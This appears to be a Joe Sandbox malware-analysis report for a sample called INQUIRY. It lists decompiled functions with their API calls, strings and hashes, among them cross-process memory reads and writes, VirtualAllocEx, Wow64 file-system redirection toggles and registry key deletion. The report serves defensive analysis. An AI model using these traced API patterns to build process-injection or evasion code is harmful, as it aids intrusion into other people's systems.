                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2683427295-24824748
                                                                                              • Opcode ID: f562b6ac61c7223f803fba234bc0d94198f5803237c488d19775263903213ce5
                                                                                              • Instruction ID: 623ffb2999f62945036b28bc97de55655b091ac7a70cedf6c82513e812a9c6f2
                                                                                              • Opcode Fuzzy Hash: f562b6ac61c7223f803fba234bc0d94198f5803237c488d19775263903213ce5
                                                                                              • Instruction Fuzzy Hash: 1CA11871204205AFD700EF64C991EAFB7ECEF89354F00492DF1559B1A2EB71EA49CB52
                                                                                              Function 00A22CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                                • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A17A51: _memmove.LIBCMT ref: 00A17AAB
                                                                                              • __swprintf.LIBCMT ref: 00A22ECD
                                                                                              Strings
                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A22D66
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                              • API String ID: 1943609520-557222456
                                                                                              • Opcode ID: 4cd42a17284ae2da064744c687fa75cbcbb8be22dce2d55c8d25933632dd3cf5
                                                                                              • Instruction ID: b188cf9a79b18482435f069c09d9013c1c184f668019a75a6dd3ffeb2aa20bb9
                                                                                              • Opcode Fuzzy Hash: 4cd42a17284ae2da064744c687fa75cbcbb8be22dce2d55c8d25933632dd3cf5
                                                                                              • Instruction Fuzzy Hash: 6E918071508211AFC714EF28D995DAFB7B8FF95710F01082DF8859B2A1EA30ED88CB52
                                                                                              Function 00A7B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A7B9BB
                                                                                              • CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7B9D4
                                                                                              • CoUninitialize.OLE32 ref: 00A7B9F1
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2126378814-24824748
                                                                                              • Opcode ID: d07f78bcb1d0b0517478ba132eab3a75236c8ca22bc976cfd0034dd1bc6957ad
                                                                                              • Instruction ID: 38b788c72d9c32cbd971258a7c9f2332b00751c5e2d08e474d3d06df9f26d0a5
                                                                                              • Opcode Fuzzy Hash: d07f78bcb1d0b0517478ba132eab3a75236c8ca22bc976cfd0034dd1bc6957ad
                                                                                              • Instruction Fuzzy Hash: 8EA159756043059FCB00EF14C994E5AB7E5FF89314F148998F8999B3A1CB31ED46CB91
                                                                                              Function 00A3501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00A350AD
                                                                                                • Part of subcall function 00A400F0: __87except.LIBCMT ref: 00A4012B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              • Opcode ID: 0f2784eeed40cdfb4896d2480d92969641d2cdc6a58d7d0ffaba3794e2ba90e9
                                                                                              • Instruction ID: 478c2fe9dc8b22f216f7fbdaa73130477a4864e9b52d719ea411fe8a34630244
                                                                                              • Opcode Fuzzy Hash: 0f2784eeed40cdfb4896d2480d92969641d2cdc6a58d7d0ffaba3794e2ba90e9
                                                                                              • Instruction Fuzzy Hash: E7518D75D085028ADB15BB7CCD41B6F2BA0DB82710F208E59F6D5862E9DF358DC4AAC2
                                                                                              Function 00A26192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$_memmove
                                                                                              • String ID: ERCP
                                                                                              • API String ID: 2532777613-1384759551
                                                                                              • Opcode ID: fb4c8e589b44390ef7856c75d417ca38559e63da6aeb8d20a3f4592c2fa4650c
                                                                                              • Instruction ID: edc6bc42f431153437450359131c90736d7059aaaacb9eb0c2924acc9ebca722
                                                                                              • Opcode Fuzzy Hash: fb4c8e589b44390ef7856c75d417ca38559e63da6aeb8d20a3f4592c2fa4650c
                                                                                              • Instruction Fuzzy Hash: B2518D71901315DBDB25CF69D945BEBB7F4EF08304F20457EE44ADA291E770AA848B40
                                                                                              Function 00A697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A69296,?,?,00000034,00000800,?,00000034), ref: 00A714E6
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A6983F
                                                                                                • Part of subcall function 00A71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00A714B1
                                                                                                • Part of subcall function 00A713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00A71409
                                                                                                • Part of subcall function 00A713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A71419
                                                                                                • Part of subcall function 00A713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A7142F
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698AC
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 6c8549aeec119bb030f678b4e6b27a8829005452a69085461cc18bd54960fffb
                                                                                              • Instruction ID: c606521a72f1cc26a71be2ae29ea5beee2e47ad4840d1b9c7741401d51f64ef6
                                                                                              • Opcode Fuzzy Hash: 6c8549aeec119bb030f678b4e6b27a8829005452a69085461cc18bd54960fffb
                                                                                              • Instruction Fuzzy Hash: 91415376A0121CBFDB20DFA4CD81ADEBBB8EF05300F008159FA59B7151DA716E45CBA1
                                                                                              Function 00A97946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A9F910,00000000,?,?,?,?), ref: 00A979DF
                                                                                              • GetWindowLongW.USER32 ref: 00A979FC
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A97A0C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 386d13a622444aa568659cc35df503d3bb35d0f8d71ffae6fbfff166b8f9bdf4
                                                                                              • Instruction ID: 3a16347f78bc60b6ea71b0eceee6c508fd71dcc3622a2c0ca5e9e7350fe56900
                                                                                              • Opcode Fuzzy Hash: 386d13a622444aa568659cc35df503d3bb35d0f8d71ffae6fbfff166b8f9bdf4
                                                                                              • Instruction Fuzzy Hash: EF319A31214206AFDF118F78DC45BEA77A9EB09324F244725F875E22E0D731E9518B60
                                                                                              Function 00A973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A97461
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A97475
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A97499
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: 5510fe012f8385a787ec7331550a7667fffa291f273577eede2232c153e2279d
                                                                                              • Instruction ID: d4138f613b426e594395f8277bb0b52a329c3d37da6726648855430a9ce6a14b
                                                                                              • Opcode Fuzzy Hash: 5510fe012f8385a787ec7331550a7667fffa291f273577eede2232c153e2279d
                                                                                              • Instruction Fuzzy Hash: 80218032610218ABDF11CFA4DC46FEE3BA9EB88724F110114FA156B191DA75AC519BA0
                                                                                              Function 00A97B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A97C4A
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A97C58
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A97C5F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: de9dd1afd78774a0e294e932ce75468c40f084d90bc80132f4f02110a6d77830
                                                                                              • Instruction ID: cccad1d00f1b146e30d2fc9a6f3ce3a9093881dd6e699431ced58eabf03b2ada
                                                                                              • Opcode Fuzzy Hash: de9dd1afd78774a0e294e932ce75468c40f084d90bc80132f4f02110a6d77830
                                                                                              • Instruction Fuzzy Hash: 07214AB5614209AFDB10DF68DCC1DAA37ECEB5A394B540459FA019B3A1CB31EC529AB0
                                                                                              Function 00A96CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A96D3B
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A96D4B
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A96D70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
                                                                                              • Instruction ID: 397d13b793310de7c0d749e1e93596d599a38d630898d380f360a7c9e63c5903
                                                                                              • Opcode Fuzzy Hash: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
                                                                                              • Instruction Fuzzy Hash: BE219232710118BFDF118F54DC45FEB3BBAEF89750F118129FA559B1A0CA719C5297A0
                                                                                              Function 00A9770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A97772
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A97787
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A97794
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
                                                                                              • Instruction ID: 3eaece3497b8814688981390fda9735d5fa48aa400326320188c6ee592b61709
                                                                                              • Opcode Fuzzy Hash: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
                                                                                              • Instruction Fuzzy Hash: 44112372210208BEEF249FA0CC05FEB37A8EF88B54F120528FA41A6090C672E811CB20
                                                                                              Function 00A14C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00A14B83,?), ref: 00A14C44
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A14C56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-1355242751
                                                                                              • Opcode ID: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
                                                                                              • Instruction ID: 28bc771e28de0fccc53113b18b17daf2a49ddbf989bb02bde296dcbee581e94b
                                                                                              • Opcode Fuzzy Hash: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
                                                                                              • Instruction Fuzzy Hash: 9ED01730B10713DFDB209F75D95864A76E4AF09352B218C3EA596DA160EB70D8C0CA90
                                                                                              Function 00A14C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00A14BD0,?,00A14DEF,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14C11
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A14C23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-3689287502
                                                                                              • Opcode ID: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
                                                                                              • Instruction ID: fb0769dcd0cb1a67ccdd5b77f407d314a7d23c604c5fd3fafabc325a75ce417b
                                                                                              • Opcode Fuzzy Hash: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
                                                                                              • Instruction Fuzzy Hash: 54D01230611713DFDB209FB5D948A46B6D9EF09351B218C3E9485D6160EAB0D4C1C690
                                                                                              Function 00A90DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00A91039), ref: 00A90DF5
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A90E07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
                                                                                              • Instruction ID: 1413c68468dca8d97d3d2488e0b71d30a0a8e0ef3c12aa8e11fc9e3fd511764e
                                                                                              • Opcode Fuzzy Hash: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
                                                                                              • Instruction Fuzzy Hash: 4CD01770610726DFDB209FB5D848B8776E5AF14392F228C7E9586D2160EAB4D890CA90
                                                                                              Function 00A890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A88CF4,?,00A9F910), ref: 00A890EE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A89100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
